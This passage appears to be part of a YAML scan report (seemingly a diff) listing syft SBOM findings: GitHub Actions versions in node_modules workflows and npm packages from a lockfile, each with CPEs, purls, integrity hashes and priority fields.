nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4424fb771af041f1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/stream-shift/.github/workflows/test.yml + startLine: 0 + message: 'Package discovered: actions/checkout v3' + title: actions/checkout v3 + description: 'Package discovered: actions/checkout v3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8effbdc22037c585 + name: actions/checkout + version: v3 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/stream-shift/.github/workflows/test.yml + accessPath: /node_modules/stream-shift/.github/workflows/test.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/checkout@v3 + metadataType: github-actions-use-statement + metadata: + value: actions/checkout@v3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a9754521213a3bbe + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/reusify/.github/workflows/ci.yml + startLine: 0 + message: 'Package discovered: actions/checkout v4' + title: actions/checkout v4 + description: 'Package discovered: actions/checkout v4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fd10fce47017fa13 + name: actions/checkout + version: v4 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/reusify/.github/workflows/ci.yml + accessPath: /node_modules/reusify/.github/workflows/ci.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/checkout@v4 + metadataType: github-actions-use-statement + metadata: + value: actions/checkout@v4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d2f68bf6461c8bf2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/busboy/.github/workflows/ci.yml + startLine: 0 + message: 'Package discovered: actions/setup-node v1' + title: actions/setup-node v1 + description: 'Package discovered: actions/setup-node v1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6b0792dcccc67817 + name: actions/setup-node + version: v1 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/busboy/.github/workflows/ci.yml + accessPath: /node_modules/busboy/.github/workflows/ci.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/setup-node@v1 + metadataType: github-actions-use-statement + metadata: + value: actions/setup-node@v1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e6602c50b5a9ed75 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/busboy/.github/workflows/lint.yml + startLine: 0 + message: 'Package discovered: actions/setup-node v1' + title: actions/setup-node v1 + description: 'Package discovered: actions/setup-node v1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0dc9162b75e9df6b + name: actions/setup-node + version: v1 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/busboy/.github/workflows/lint.yml + accessPath: /node_modules/busboy/.github/workflows/lint.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/setup-node@v1 + metadataType: github-actions-use-statement + metadata: + value: actions/setup-node@v1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 75e343f3c07ad957 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/streamsearch/.github/workflows/ci.yml + startLine: 0 + message: 'Package discovered: actions/setup-node v1' + title: actions/setup-node v1 + description: 'Package discovered: actions/setup-node v1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 303b3812127b618f + name: actions/setup-node + version: v1 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/streamsearch/.github/workflows/ci.yml + accessPath: /node_modules/streamsearch/.github/workflows/ci.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/setup-node@v1 + metadataType: github-actions-use-statement + metadata: + value: actions/setup-node@v1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f81ee12d2fe7942d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/streamsearch/.github/workflows/lint.yml + startLine: 0 + message: 'Package discovered: actions/setup-node v1' + title: actions/setup-node v1 + description: 'Package discovered: actions/setup-node v1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5dcd76ce8f7aa30c + name: actions/setup-node + version: v1 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/streamsearch/.github/workflows/lint.yml + accessPath: /node_modules/streamsearch/.github/workflows/lint.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/setup-node@v1 + metadataType: github-actions-use-statement + metadata: + value: actions/setup-node@v1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f2b699c115f128e7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml + startLine: 0 + message: 'Package discovered: actions/setup-node v2' + title: actions/setup-node v2 + description: 'Package discovered: actions/setup-node v2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 94c6b30301562d90 + name: actions/setup-node + version: v2 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml + accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/setup-node@v2 + metadataType: github-actions-use-statement + metadata: + value: actions/setup-node@v2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c207c7fc955b5ded + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/stream-shift/.github/workflows/test.yml + startLine: 0 + message: 'Package discovered: actions/setup-node v3' + title: actions/setup-node v3 + description: 'Package discovered: actions/setup-node v3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c1170e00c0039987 + name: actions/setup-node + version: v3 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/stream-shift/.github/workflows/test.yml + accessPath: /node_modules/stream-shift/.github/workflows/test.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/setup-node@v3 + metadataType: github-actions-use-statement + metadata: + value: actions/setup-node@v3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 751a614666804651 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/reusify/.github/workflows/ci.yml + startLine: 0 + message: 'Package discovered: actions/setup-node v4' + title: actions/setup-node v4 + description: 'Package discovered: actions/setup-node v4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: de6527b74c32bd7a + name: actions/setup-node + version: v4 + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/reusify/.github/workflows/ci.yml + accessPath: /node_modules/reusify/.github/workflows/ci.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/actions/setup-node@v4 + metadataType: github-actions-use-statement + metadata: + value: actions/setup-node@v4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 87ee223622bbf049 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: agent-base 6.0.2' + title: agent-base 6.0.2 + description: 'Package discovered: agent-base 6.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 12d1ed2dd95a1a7c + name: agent-base + version: 6.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:agent-base:agent-base:6.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:agent-base:agent_base:6.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:agent_base:agent-base:6.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:agent_base:agent_base:6.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:agent:agent-base:6.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:agent:agent_base:6.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/agent-base@6.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz + integrity: sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ== + dependencies: + debug: '4' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3360c58589af5938 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: agent-base 7.1.4' + title: agent-base 7.1.4 + description: 'Package discovered: agent-base 7.1.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f7259be6132b188d + name: agent-base + version: 7.1.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:agent-base:agent-base:7.1.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:agent-base:agent_base:7.1.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:agent_base:agent-base:7.1.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:agent_base:agent_base:7.1.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:agent:agent-base:7.1.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:agent:agent_base:7.1.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/agent-base@7.1.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz + integrity: sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 83a9e4994a4bae21 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ansi-regex 5.0.1' + title: ansi-regex 5.0.1 + description: 'Package discovered: ansi-regex 5.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 434b3315d409487e + name: ansi-regex + version: 5.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ansi-regex_project:ansi-regex:5.0.1:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/ansi-regex@5.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz + integrity: sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 55dee429ce8d0ebc + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ansi-regex 6.2.2' + title: ansi-regex 6.2.2 + description: 'Package discovered: ansi-regex 6.2.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 351fe1b55f0afa57 + name: ansi-regex + version: 6.2.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ansi-regex_project:ansi-regex:6.2.2:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/ansi-regex@6.2.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.2.2.tgz + integrity: sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 78d002033ed5f3df + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ansi-styles 4.3.0' + title: ansi-styles 4.3.0 + description: 'Package discovered: ansi-styles 4.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d7348151a8592cc2 + name: ansi-styles + version: 4.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ansi-styles:ansi-styles:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ansi-styles:ansi_styles:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ansi_styles:ansi-styles:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ansi_styles:ansi_styles:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ansi:ansi-styles:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ansi:ansi_styles:4.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/ansi-styles@4.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz + integrity: sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg== + dependencies: + color-convert: ^2.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5a3dc64757afbf1c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ansi-styles 6.2.3' + title: ansi-styles 6.2.3 + description: 'Package discovered: ansi-styles 6.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b7d3f8e2ee8c8206 + name: ansi-styles + version: 6.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ansi-styles:ansi-styles:6.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ansi-styles:ansi_styles:6.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ansi_styles:ansi-styles:6.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ansi_styles:ansi_styles:6.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ansi:ansi-styles:6.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ansi:ansi_styles:6.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/ansi-styles@6.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.3.tgz + integrity: sha512-4Dj6M28JB+oAH8kFkTLUo+a2jwOFkuqb3yucU0CANcRRUbxS0cP0nZYCGjcc3BNXwRIsUVmDGgzawme7zvJHvg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a0800e7f7f0173c9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: any-promise 1.3.0' + title: any-promise 1.3.0 + description: 'Package discovered: any-promise 1.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: dc69ebae19192ee6 + name: any-promise + version: 1.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:any-promise:any-promise:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:any-promise:any_promise:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:any_promise:any-promise:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:any_promise:any_promise:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:any:any-promise:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:any:any_promise:1.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/any-promise@1.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/any-promise/-/any-promise-1.3.0.tgz + integrity: sha512-7UvmKalWRt1wgjL1RrGxoSJW/0QZFIegpeGvZG9kjp8vrRu55XTHbwnqq2GpXm9uLbcuhxm3IqX9OB4MZR1b2A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4e58783cc9de2b91 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: anymatch 3.1.3' + title: anymatch 3.1.3 + description: 'Package discovered: anymatch 3.1.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0f1f6d6adbfca65a + name: anymatch + version: 3.1.3 + type: npm + foundBy: 